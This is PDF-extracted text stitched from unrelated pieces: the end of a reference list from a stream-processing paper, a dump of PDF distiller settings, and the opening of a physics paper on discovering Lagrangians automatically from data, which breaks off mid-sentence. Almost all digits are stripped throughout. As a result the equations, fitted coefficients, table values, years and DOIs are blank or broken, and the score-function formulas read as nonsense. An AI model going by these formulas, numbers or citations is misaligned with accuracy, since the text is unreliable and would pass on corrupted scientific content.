ad, katz r, konwinski a, lee g, patterson d, rabkin a, stoica i, zaharia m. . a view of cloud computing. communications of the acm ( ): – doi . / . . babcock b, datar m, motwani r. . load shedding for aggregation queries over data streams. in: th international conference on data engineering, boston, ma, usa. piscataway: ieee, – . balakrishnan h, balazinska m, carney d, çetintemel u, cherniack m, convey c, galvez e, salz j, stonebraker m, tatbul n, tibbetts r, zdonik s. . retrospective on aurora. international journal on very large data bases ( ): – doi . /s - - - . carbone p, katsifodimos a, ewen s, markl v, haridi s, tzoumas k. . apache flink: stream and batch processing in a single engine. data engineering bulletin ( ): – . hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/visp-streaming http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cardellini v, grassi v, lo presti f, nardelli m. . distributed qos-aware scheduling in storm. in: th international conference on distributed event-based systems (debs), oslo, norway. new york: acm, – . castro fernandez r, migliavacca m, kalyvianaki e, pietzuch p. . integrating scale out and fault tolerance in stream processing using operator state management. in: international conference on management of data (sigmod), new york, ny, usa. new york: acm, – . copil g, moldovan d, truong h-l, dustdar s. . rsybl: a framework for specifying and controlling cloud services elasticity. acm transactions on internet technology ( ): – doi . / . de matteis t, mencagli g. . keep calm and react with foresight: strategies for low-latency and energy-efficient elastic data stream processing. in: st acm sigplan symposium on principles and practice of parallel programming, barcelona, spain. new york: acm, – . florescu d, kossmann d. . rethinking cost and performance of database systems. acm sigmod record ( ): – doi . / . . gedik b, andrade h, wu k-l, yu ps, doo m. . spade: the system s declarative stream processing engine. in: international conference on management of data (sigmod), vancouver, bc, canada. new york: acm, – . gedik b, schneider s, hirzel m, wu k-l. . elastic scaling for data stream processing. transactions on parallel and distributed systems ( ): – doi . /tpds. . . genaud s, gossa j. . cost-wait trade-offs in client-side resource provisioning with elastic clouds. in: international conference on cloud computing (cloud), washington, dc, usa. piscataway: ieee, – . gulisano v, jimenez-peris r, patino-martinez m, soriente c, valduriez p. . streamcloud: an elastic and scalable data streaming system. ieee transactions on parallel and distributed systems ( ): – doi . /tpds. . . hanna f, marchal l, nicod j-m, philippe l, rehn-sonigo v, sabbah h. . minimizing rental cost for multiple recipe applications in the cloud. in: international parallel and distributed processing symposium workshops (ipdpsw), chicago, il, usa. piscataway: ieee, – . heinze t, roediger l, meister a, ji y, jerzak z, fetzer c. . online parameter optimization for elastic data stream processing. in: th acm symposium on cloud computing. new york: acm, – . hindman b, konwinski a, zaharia m, ghodsi a, joseph ad, katz rh, shenker s, stoica i. . mesos: a platform for fine-grained resource sharing in the data center. in: th usenix conference on networked systems design and implementation (nsdi), boston, ma, usa. berkeley: usenix association, . hochreiner c. . visp testbed—a toolkit for modeling and evaluating resource provisioning algorithms for stream processing applications. in: kopp o, lenhard j, pautasso c, eds. in: th zeus workshop (zeus ), lugano, switzerland. ceur-ws, – . hochreiner c, schulte s, dustdar s, lecue f. . elastic stream processing for distributed environments. ieee internet computing ( ): – doi . /mic. . . hochreiner c, vögler m, schulte s, dustdar s. a. elastic stream processing for the internet of things. in: th international conference on cloud computing (cloud), san francisco, ca, usa. pisacataway: ieee, – . hochreiner c, vögler m, waibel p, dustdar s. b. visp: an ecosystem for elastic data stream processing for the internet of things. in: th international enterprise distributed object computing conference (edoc), vienna, austria. pisacataway: ieee, – . hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . /tpds. . http://dx.doi.org/ . /tpds. . http://dx.doi.org/ . /mic. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hoenisch p, schuller d, schulte s, hochreiner c, dustdar s. . optimization of complex elastic processes. transactions on services computing ( ): – doi . /tsc. . . kulkarni s, bhagat n, fu m, kedigehalli v, kellogg c, mittal s, patel jm, ramasamy k, taneja s. . twitter heron: stream processing at scale. in: international conference on management of data (sigmod), melbourne, victoria, australia. new york: acm, – . lim h, han y, babu s. . how to fit when no one size fits. in: th biennial conference on innovative data systems research (cidr ’ ), asilomar, ca, usa, . lohrmann b, janacik p, kao o. . elastic stream processing with latency guarantees. in: th international conference on distributed computing systems (icdcs), columbus, oh, usa. piscataway: ieee, – . mcafee a, brynjolfsson e, davenport th, patil d, barton d. . big data: management revolution. harvard business review ( ): – . nakajima s. . introduction to tpm: total productive maintenance. new york: productivity press, inc. satzger b, hummer w, leitner p, dustdar s. . esc: towards an elastic stream computing platform for the cloud. in: international conference on cloud computing (cloud), washington, dc, usa. piscataway, – . schneider s, andrade h, gedik b, biem a, wu k-l. . elastic scaling of data parallel operators in stream processing. in: international symposium on parallel & distributed processing (ipdps), rome, italy. piscataway, – . schulte s, hoenisch p, hochreiner c, dustdar s, klusch m, schuller d. . towards process support for cloud manufacturing. in: th international enterprise distributed object computing conference (edoc), ulm, germany. piscataway: ieee, – . setty v, vitenberg r, kreitz g, urdaneta g, van steen m. . cost-effective resource allocation for deploying pub/sub on cloud. in: th international conference on distributed computing systems (icdcs), madrid, spain. piscataway: ieee, – . tatbul n, çetintemel u, zdonik s. . staying fit: efficient load shedding techniques for distributed stream processing. in: proceedings of the rd international conference on very large data bases, september – , university of vienna, austria, – . toshniwal a, taneja s, shukla a, ramasamy k, patel jm, kulkarni s, jackson j, gade k, fu m, donham j, bhagat n, mittal s, ryaboy d. . storm@twitter. in: international conference on management of data (sigmod), snowbird, ut, usa. new york: acm, – . vavilapalli vk, murthy ac, douglas c, agarwal s, konar m, evans r, graves t, lowe j, shah h, seth s, saha b, curino c, o’malley o, radia s, reed b, baldeschwieler e. . apache hadoop yarn: yet another resource negotiator. in: proceedings of the th annual symposium on cloud computing. santa clara, ca, usa. acm, . xu j, chen z, tang j, su s. . t-storm: traffic-aware online scheduling in storm. in: th international conference on distributed computing systems (icdcs), madrid, spain. washington, d.c.: ieee, – . xu l, peng b, gupta i. . stela: enabling stream processing systems to scale-in and scale-out on-demand. in: international conference on cloud engineering (ic e), berlin, germany. pisacataway: ieee. zaharia m, chowdhury m, franklin mj, shenker s, stoica i. . spark: cluster computing with working sets. in: hotcloud, boston, ma, usa, vol. , – . hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tsc. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cost-efficient enactment of stream processing topologies introduction motivation problem definition optimization approach evaluation results and discussion related work conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice an algorithm for discovering lagrangians automatically from data submitted august accepted october published november corresponding author jonathan j. hudson, jony.hudson@imperial.ac.uk academic editor jingbo wang additional information and declarations can be found on page doi . /peerj-cs. copyright hills et al. distributed under creative commons cc-by . open access an algorithm for discovering lagrangians automatically from data daniel j.a. hills, adrian m. grütter and jonathan j. hudson department of physics, imperial college of science, technology and medicine, london, united kingdom abstract an activity fundamental to science is building mathematical models. these models are used to both predict the results of future experiments and gain insight into the structure of the system under study. we present an algorithm that automates the model building process in a scientifically principled way. the algorithm can take ob- served trajectories from a wide variety of mechanical systems and, without any other prior knowledge or tuning of parameters, predict the future evolution of the system. it does this by applying the principle of least action and searching for the simplest lagrangian that describes the system’s behaviour. by generating this lagrangian in a human interpretable form, it can also provide insight into the workings of the system. subjects artificial intelligence, data mining and machine learning, scientific computing and simulation keywords lagrangian, physics, least-action, discovery introduction modern science is, in many senses, highly automated. experiments are frequently run under computer control, with data often recorded by the computer directly. computerised data analysis and visualisation are widely used to process the resulting large volumes of data. indeed, the ability to collect and analyse massive data sets is opening up an entirely new measure-first-ask-questions-later approach to science: the square kilometer array radio telescope is expected to collect approximately one exabyte of data per day (newman & tseng, ); over collisions from the atlas detector were analysed in the search for the higgs boson (atlas collaboration, ); and state-of-the-art whole-genome sequencers can currently sequence gigabases per day (hayden, ). in each of these examples the scientific questions are not fully formulated in advance of taking the data, and the question of how to best extract knowledge from the dataset is of great interest. this motivates the study of how to scale up the processes of scientific reasoning to take advantage of the wealth of available data. thus far, scientific reasoning has largely resisted automation. hypothesising and refining models is still on the whole carried out by humans, with little direct support from computers. it has long been a desire of artificial intelligence researchers to automate this part of science, and with the growing volume of data available from experiments the motivation for this desire comes ever more sharply into focus. in this paper we present a step in this direction: an algorithm that automates finding a mathematical model for a system, in a scientifically principled way, by examining only its observed behaviour. how to cite this article hills et al. ( ), an algorithm for discovering lagrangians automatically from data. peerj comput. sci. :e ; doi . /peerj-cs. mailto:jony.hudson@imperial.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. early attempts to automatically model physical systems searched for simple math- ematical regularities in observed quantities. langley’s ( ) bacon system was able to re-discover many simple laws—the ideal gas law, ohm’s law, coulomb’s law and others—from experimental data. dzeroski & todorovski ( ) went beyond simple static laws with their lagrange system which was able to search for differential equations that governed observed time series. they extended this work to the lagramge system which additionally allowed an expert user to provide domain knowledge, improving the quality of the results (todorovski & dzeroski, ). the pret system, developed by bradley and collaborators ( ), brings to bear a variety of advanced ai techniques on the problem of identifying system differential equations. it has a sophisticated method for representing qualitative observations, and allows expert-user domain knowledge to be combined with automatic search very effectively. schmidt & lipson ( ) used a genetic programming approach to automatically evolve invariant mathematical expressions from observed data. note that schmidt and lipson originally claim that their technique is capable of discovering lagrangians, but it has been shown that this is false except for lagrangians of a very particular, trivial form (hillar & sommer, ). schmidt & lipson ( ) do not include their claim in a subsequent paper on the same work. in the context of engineering, there is a significant body of work on ‘system identification’, with techniques ranging from very general ad hoc fitting methods to fitting detailed physical models representing important classes of system (sjberg et al., ; ljung, ). in this work we take a different approach than those described above, the essence of which is that we embed a simple, general physical principle—the principle of least action—and very little else into our algorithm. while we are embedding the domain knowledge of a physicist in our algorithm, we are not embedding information about any particular physical system or class thereof. rather we are capturing a deep understanding that has been distilled by physicists over the past years, and packaging it into an algorithm that can be applied by non-experts. we find the algorithm to be surprisingly powerful, given its simplicity, but this power comes not from the ingenuity of its construction, rather from the broad applicability of the physical principle embedded in it. the principle of least action the principle of least action is one of the most fundamental and most celebrated principles in physics. first proposed by maupertuis ( ) and euler ( ) it states that the problem of predicting the behaviour of many physical systems can be cast as finding the behaviour that minimises the expenditure given by some cost function. the total expenditure of the system is known as the action. it is a remarkable fact that the behaviour of a very wide range of physical systems—including those studied in classical mechanics, special and general relativity, quantum field theory, and optics—can all have their behaviour explained in terms of minimising a cost function. each physical system has its own cost function, and once this function is known it is possible to predict exactly what the system will do in the future. the exercise of determining the cost function—often known as lagrange’s function, or just the lagrangian—for a particular physical system is central to physics. feynman described this process well (feynman, leighton & sands, ) as “some kind of trial and error” advising students that “you just have to fiddle around with the equations that you know and see if you can get them into the form of the principle of least action.” in this paper we hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. present an algorithm that does this “fiddling” automatically, without requiring the user to have any expertise in physics. the lagrangian is well-suited to be the output of an automated modelling algorithm. it has the desirable property in that it is a single, scalar expression that contains everything necessary to predict the system’s future evolution. consider, in contrast, finding the hamiltonian where it would also be necessary to find the corresponding conjugate momenta. the lagrangian has the additional quality that it is coordinate-independent and as a result can be written in any coordinate system. this is useful in the case of an automated algorithm where it is not obvious in which coordinate system the data might be presented. however, it should be noted that not all physical systems can be described by a lagrangian. in particular, dissipative systems can not be modelled this way. nevertheless, many interesting processes do admit a lagrangian formulation, and what’s more, as the algorithm is automatic little is lost by speculatively applying it to a system’s trajectory. we might imagine a future where an ensemble of algorithms such as this one try to find an appropriate model for a system, based on a variety of physical principles and insights. we present this algorithm as a step towards such a future system. the problem of taking a lagrangian and automatically calculating the resulting motion of the system has been widely studied and applied. to the best of our knowledge, this work is the first that solves the inverse problem of taking the observed motion and calculating the lagrangian for non-trivial systems. the algorithm to find a model for a system we search over a space of possible lagrangians. to do this we need three elements: an objective to guide the search, which will take the form of a score function; a representation of the possible lagrangians; and an algorithm to execute the search over the possible lagrangians, working to improve the score. we will first describe the score function, which is the central idea of the algorithm. score function the objective of our algorithm is to find a lagrangian that, when integrated along the system’s observed trajectory, yields a smaller total (action) than when integrated along any neighbouring trajectory. it would be possible to implement this definition of the least action principle directly in an algorithm, but instead we take an indirect approach that is more computationally efficient. for a lagrangian l(θ,φ,...,θ̇ ,φ̇,...) and a trajectory (θ (t),φ(t),...,θ̇ (t),φ̇(t),...) it is possible to write down a condition, in the form of a set of differential equations, that must be satisfied if the action is to be stationary along the trajectory. these differential equations are known as euler–lagrange’s equations, d dt ∂ l ∂q̇ − ∂ l ∂q = , where q ∈ {θ,φ,...}. it is to be understood that the partial derivatives are taken symbolically with respect to the coordinates and velocities, which are then replaced with the time-dependent functions from the trajectory before the time-derivative is taken. we hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. can define a score function based on these conditions, el(l) =  q∈{θ,φ,...}   d dt ∂ l ∂q̇ − ∂ l ∂q  dt, ( ) which is zero if the euler–lagrange equations are exactly satisfied. we note that hillar and sommer first proposed using a (different) score function derived from the euler–lagrange equations in hillar & sommer ( ), but did not apply it to finding lagrangians from data. in practice our observations of the system are not functions (θ (t),φ(t),...,θ̇ (t),φ̇(t),...) but discretely sampled time-series of the coordinates and generalized velocities. the algorithm operates with a dataset which is a time-series of samples d = ((θ ( ),φ( ),...,θ̇ ( ),φ̇( ),...),...). where time runs from t = ...n . the velocity samples may be either directly measured or derived from measured coordinate data. we divide this time-series into two portions, a training set, comprising samples ...m, and a validation set of samples m + ...n . the algorithm will conduct its search using only the training set, reserving the validation set for out-of-sample measurement of the prediction error. in this way we can truly test the algorithm’s ability to predict the future dynamics of the system. in all of the examples in this paper the sampling times will be evenly spaced, but this is not a requirement. we can discretize the euler–lagrange score function (eq. ( )) to work with these sampled datasets, giving eld(l) = m t=  q∈{θ,φ,...}  d dt ∂ l ∂q̇  t −  ∂ l ∂q  t  , ( ) where the subscript on the score indicates that it is taken with respect to the dataset d. the square-bracketed quantities in this expression are time-series, and the subscript indicates taking the element in this time-series at the given time. so, for instance, the first term in ( ) is to be calculated, in principle, by: first differentiating the candidate lagrangian l symbolically with respect to the appropriate generalized velocity; evaluating this quantity at every time-step in the dataset to yield a new time-series; taking the discrete derivative of this new time-series with respect to time; and finally finding the element at time t in this time-derivative time-series. in practice, as we shall see below, a more computationally efficient implementation may be used. the function eld is the basis of the score function, capturing the principle of least action, but it is not sufficient on its own. while it is true that the lagrangian we seek minimises eld, the converse is not true as there are other functions which minimise eld but are not physically meaningful lagrangians. the first class of functions that we wish to avoid are those which are numerically tiny, for instance l = − θ . we deal with these by hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. introducing a normalisation score for each candidate lagrangian, nd(l) = m t=  q∈{θ,φ,...}  d dt ∂ l ∂q̇  t +  ∂ l ∂q  t . we will compose our final score from the scores eld and nd in such a way, to be detailed below, that to score well a candidate lagrangian must simultaneously have a low score for eld and a score of around one for nd. the target value of one for nd is chosen arbitrarily. we can always arrange for the normalisation score to be approximately one, as the least-action trajectory is unchanged if the lagrangian is scaled by a constant. there is a second, more interesting class, of unwanted expressions that minimise the euler–lagrange score eld. consider, for instance, the candidate lagrangian l = θ nθ̇ . this lagrangian satisfies the euler–lagrange equations trivially, in a way that does not depend on the trajectory. such path-independent least-action lagrangians are interesting from a physics point-of-view, being closely related to gauge invariance, but here they are a nuisance. to guide the search away from these expressions we introduce a second ‘control’ trajectory, c. this trajectory is unrelated to the behaviour of the system under study and serves solely to eliminate path-independent lagrangians. we reason that the lagrangian that we are seeking will score well with eld but should score poorly on elc, which is the euler–lagrange score evaluated along the control trajectory. the exact form of the control trajectory is unimportant so long as it not a valid trajectory of the system under study. in this work we use a control trajectory which is uniform motion in each coordinate, with velocity arbitrarily chosen to be . , for all experiments. we combine the three parts described above to give the search score function, s(l) = u (nd(l))u (elc(l)) eld(l) + ϵ elc(l) + ϵ , ( ) where u(x) = ln(x + ϵ) + is a function that is minimised, with value approximately one, when the argument is one. the small constant ϵ, typically set to be − , ensures that the score function has the desired asymptotic behaviour for small values of the numerator and denominator, even when faced with errors from finite precision machine numbers. the factor u (elc(l)) prevents the search algorithm from driving towards lagrangians that perform badly on the real dataset, but even worse on the control data. overall, the score function drives the search to find lagrangians that simultaneously minimise the action along the observed trajectory while having a non-zero action along the control trajectory, and a normalisation score close to one. we note that the way that the score function is assembled is somewhat ad hoc. its purpose is to guide the search to the correct answer while avoiding pathologies, and there are a number of ways this could be done—indeed, many were tried during development. this score function is simply presented as a particular arrangement that we have demonstrated to work. note that the score function, s, does not in any way consider whether the prediction of the candidate lagrangian agrees with the training data. it only considers whether the trajectory satisfies a least action principle for the candidate lagrangian. the fact that this, hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. on the face of it unrelated, objective leads to successful predictions is the insight from physics that we have embedded in our algorithm. representation and search we have experimented with two representations of candidate lagrangians. the first, a restricted polynomial representation, allows a fast search algorithm to be implemented. it is limited in the lagrangians it can represent exactly, although through taylor’s theorem it can find approximations to any lagrangian. this representation was used to generate the bulk of the results in this paper, and we describe it in detail in this section. the second representation lifts some of the constraints of the restricted polynomial model, at the expense of vastly increased computational cost. we describe it in ‘generalisation’. the restricted polynomial representation assumes that the lagrangian can be represented by a polynomial in the coordinates and velocities. the model is a sum of monomial terms, parameterised by coefficients multiplying every term. we restrict this polynomial in two ways: we limit the maximum power of any coordinate or velocity to be m; and we limit the maximum degree of any combination of coordinates and velocities to p. in addition, we remove any terms from the model that can have no physical significance, that is terms that are constant or of the form qnq̇. these terms simply “fall through” the euler–lagrange equation without changing the resulting equations of motion, so there is no value in including them in the search. for example, for one variable θ with m = and p = the resulting model would be c θ̇ + c θ̇ + c θ + c θ θ̇ + c θ θ̇ + c θ + c θ θ̇ + c θ . for a given restricted polynomial model the score function is minimised by adjusting the parameters ci. we conduct this optimisation using the nelder–mead simplex algorithm (nelder & mead, ) using the modified parameters of gao & han ( ) which improve the efficiency in high dimensions. the coefficients are bounded between − and , enforced by a penalty function. we use a tight convergence tolerance, usually one part in , to encourage the search to break out of local minima. we impose a maximum iteration limit, usually × , on the search to ensure that it is bounded in time. we do not know in advance what values of m and p are needed to accurately represent the lagrangian of the system under study. what’s more, we wish to find the simplest lagrangian such that the trajectory satisfies the principle of least action. we approach this using a simple heuristic algorithm. we start with the smallest non-trivial model (m = ,p = ) and optimise the parameters with the simplex search. we then make an in-sample prediction of how well the optimised lagrangian predicts the dynamics of the system in the training sample. this is done by generating equations of motion from the optimised lagrangian and numerically solving them, using initial conditions derived from the first sample in the dataset. if this in-sample prediction fits better than a specified tolerance then we stop and return the lagrangian. if it does not fit then we generate a larger model (i.e., with larger values of m and/or p) and try again. the models are stepped through in increasing number of monomial terms. this proceeds until either a model hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure sketches of the five test systems that we consider. is found that fits or a maximum bound on model complexity is reached. this heuristic algorithm only crudely captures the notion of mathematical complexity of the model, but it seems to work adequately well. note that, for a given polynomial model, it is possible to partially pre-calculate the score function eld for a given dataset, yielding a function quadratic in the coefficients ci. this is possible because the form of the model is fixed and it is possible to calculate its derivatives in advance. as a result, after the initial simplification of the score function, optimisation iterations are fast, and have a run-time independent of the number of data points. code for the score function, search algorithms and the datasets we use below can be downloaded from hudson, hills & grütter (a). results we will consider five test systems, illustrated in fig. . the first is the unforced duffing oscillator, a textbook non-linear system. the second, a simple pendulum, is interesting because its lagrangian cannot be represented exactly in the restricted polynomial representation. the third system, two masses on a frictionless surface joined by three springs to each other and two immovable walls, has two coupled degrees of freedom. the fourth system is the double pendulum, a coupled, two degree-of-freedom non-linear system capable of chaotic motion. as with the simple pendulum, the double pendulum cannot have its lagrangian represented exactly by a finite degree polynomial. the fifth and final system is the penning-type ion-trap, a three degree-of-freedom system with magnetic and electrostatic forces, that is of considerable experimental relevance. figure shows the result of applying the algorithm to simulated data sets for these systems. it can be seen that the algorithm is able to successfully predict the future dynamics of all of the test systems. let us look in detail at the progress of the algorithm, and the resulting learned models, for two of the example systems. in the case of the duffing oscillator the algorithm tried seven, increasingly complex, polynomial models to arrive at the prediction shown, which was generated by the model with m = and p = . the final model has free parameters, and required , nelder–mead iterations to optimise. the complete search working through all seven models, with a single-threaded implementation, executes in under five seconds on a . ghz intel core i - u powered macbook air. the optimised lagrangian, where we have removed terms with coefficients less than − and displayed the remaining hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure result of running the algorithm on simulated data from the five test systems. in each graph panel, the (blue) open circles to the left of the vertical bar are the training data. the solid (red) line, to the right of the vertical bar is the algorithm’s prediction. the (red) filled circles to the right of the bar show the actual behaviour of the system. for clarity only every third validation point is shown. the algorithm does not have access to these validation points when it is making its prediction. it can be seen that the algorithm has accurately learned the dynamics of the system in each case. coefficients to two decimal places for clarity, was l = − . x + . x + . ẋ . this is exactly the expression, apart perhaps from overall scaling, that would be written by a human physicist. the coefficients yielded by the search are found to match the correct hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure application of the algorithm to data with simulated noise added. the graphs are in the same format as fig. . we see that the algorithm is robust to noise, finding a model that accurately predicts the future evolution. coefficients to the th decimal place, limited by the convergence tolerance that we set. by generating a model in this form the algorithm gives insight into the system directly from the data. the case of the simple pendulum is also interesting to consider. here the search algorithm tried three models, where the third, with m = and p = , converged in nelder–mead iterations. the search in this case took around . s. the generated model, multiplied by to make it more readable, was l = . x + . x − . ẋ − . xẋ − . x ẋ . ( ) it can be noted that this is not a straightforward taylor expansion of the simple pendulum’s lagrangian, and it is not obvious how to relate it to the standard form. experimenting with removing terms and solving the resultant equations of motion indicates that the terms proportional to x and xẋ are unimportant, but the relatively small term in x ẋ is essential. despite being in an unexpected form, this lagrangian does make successful predictions. we shall see in ‘generalisation’ that it is in fact a local approximation of a true lagrangian around the region of configuration space that the training trajectory explored. real world measurements are inevitably noisy and so to be practically useful it is important that the algorithm is able to converge even in the presence of imperfections in the data. we took the data for our third test system—the coupled harmonic oscillators— and added normally distributed noise, with standard deviation . (about % of the oscillation amplitude) to the position, velocity, and acceleration. figure shows the result of running the algorithm on this noisy data set. we see that the algorithm is robust to this noise, finding a model that describes the future evolution well. hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table summary of models found for each of the test systems and the computational effort required to find them. “total iterations” gives the number of nelder–mead iterations used searching through all forms of the model, including the final form. “final iterations” gives the number of nelder–mead itera- tions used refining the final form of the model. the “generalised simple pendulum” will be introduced in ‘generalisation’. system (m,p) parameters total iterations final iterations time to converge (s) duffing oscillator ( , ) , , . simple pendulum ( , ) . coupled harmonic oscillator ( , ) , , . double pendulum ( , ) , , penning trap ( , ) , , . oscillator with noise ( , ) , , . generalised simple pendulum ( , ) , , . table summarises the size of the models found and the computational effort required to find them. we have not conducted a detailed study of how this proof-of-principle algorithm scales as the problem size increases, but note that our preliminary investigations show that it scales quite poorly. we find that the primary determinant of convergence rate seems to be the number of free parameters in the model. we therefore speculate that a more sophisticated technique for varying the structure of the model might be of use in improving the performance. a particularly promising approach might be to follow (clegg et al., ) and use a genetic algorithm to evolve the form of the model in combination with a continuous algorithm like nelder–mead to optimise the parameter values for any given model form. generalisation we have shown that the algorithm can find models which successfully predict the future evolution of the system’s behaviour. however, a good physical model does not just capture the behaviour of a particular time-series, corresponding to a particular set of initial conditions. rather, it should be able to predict the behaviour of the system over a range of initial conditions. it is perhaps this 